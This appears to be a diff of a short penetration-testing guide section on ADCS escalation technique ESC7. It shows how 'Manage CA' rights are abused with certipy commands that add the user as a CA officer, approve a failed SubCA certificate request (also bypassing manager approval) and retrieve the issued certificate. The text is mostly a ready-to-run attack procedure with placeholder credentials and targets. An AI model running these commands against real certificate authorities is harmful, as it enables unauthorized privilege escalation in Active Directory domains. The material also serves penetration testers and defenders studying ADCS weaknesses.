ADCS - Privilege Escalation as a Service

 ESC7 - Vulnerable Certificate Authority Access Control

 This time not the administrative rights to the server, but to the CA itself.
-The "Manage CA" or "Manage Certificates" permission.
-The permission is exploited to grant the user write permissions to a certificate template and then convert this to an ESC1.
+The authorization “Manage CA” or “Manage Certificates”.
+The authorization is exploited to grant the user write rights to a certificate template and then to convert this to an ESC1.

 certipy ca -u USER -p PASSWORD -ca CA_NAME -target IP/FQDN_CA -add-officer USER

-This will give us the "Issue and Manage Certificates" authorization.
+This gives us the "Issue and Manage Certificates" authorization.

-This allows us to approve even failed requests and roll out the corresponding certificates.
-For example, the "SubCA" certificate, which by default only administrators are allowed to request.
+This allows us to approve failed requests ourselves and roll out the corresponding certificates.
+For example, the "SubCA" certificate, which by default only administrators may request.

-After a failed request, be sure to save the "private key", this will be needed later.
+After a failed request, be sure to save the "private key", this will be required later.

 certipy ca -u USER -p PASSWORD -ca CA_NAME -target IP/FQDN_CA -issue-request REQ_ID

-After approving the request, which can also be used to bypass a "manager approval", retrieve the approved certificate.
+After releasing the request, which can also be used to bypass a "manager approval", collect the released certificate.

 certipy req -u USER -p PASSWORD -ca CA_NAME -target IP/FQDN_CA -retrieve REQ_ID